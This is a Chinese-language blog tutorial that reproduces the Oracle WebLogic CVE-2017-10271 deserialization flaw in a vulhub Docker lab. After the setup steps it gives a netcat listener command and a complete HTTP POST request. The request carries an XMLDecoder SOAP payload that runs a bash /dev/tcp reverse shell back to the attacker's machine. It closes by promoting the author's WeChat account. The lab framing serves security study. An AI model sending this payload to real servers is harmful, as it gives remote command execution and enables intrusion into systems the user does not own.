搭建环境
ubuntu 16.04 weblogic所在的环境
kali2020 攻击机
前言
https://www.anquanke.com/post/id/92003 漏洞原理(代码分析)
首先ubuntu中要有docker,用docker部署环境会省很多时间
apt-get install docker*
service start docker
安装git
apt-get install git
docker -v
可以看docker有没有安装成功
创建或者修改/etc/docker/daemon.json文件
{
“registry-mirrors”: [“https://cr.console.aliyun.com”]
}
下载vulhub靶场,这里面包含很多cve漏洞,对一些研究漏洞小伙伴来说算是福音了
放在方便找到的文件夹下,否则就是在当前的目录下下载
wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip
unzip vulhub-master.zip
cd vulhub-master
在weblogic目录下,cve-2017-10271
可以用cat README.md
查看复现过程
docker常用命令
docker ps 查看运行中的容器
docker start 容器名字 启动容器
docker stop 容器名字 暂停容器
docker exec -it 容器ID /bin/bash 进入容器内部
用docker compose up -d
搭建环境
访问ubuntu的ip地址+7001端口,有下面这个页面说明搭建成功
复现过程
访问http://10.92.1.126:7001/wls-wsat/CoordinatorPortType11,如下图说明存在漏洞
在kali上开启端口监听
nc -l -p 21
构造发送的post数据包,注意payload部分需要html编码,README.md文件中也有提到
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 633
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i >& /dev/tcp/接收shell的ip/21 0>&1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
发送成功后就反弹到shell了
如果还有不懂的地方可以关注我的公众号“沉淀Hack”,发消息向我留言,每天会更新大量干货教程,快扫下面的二维码吧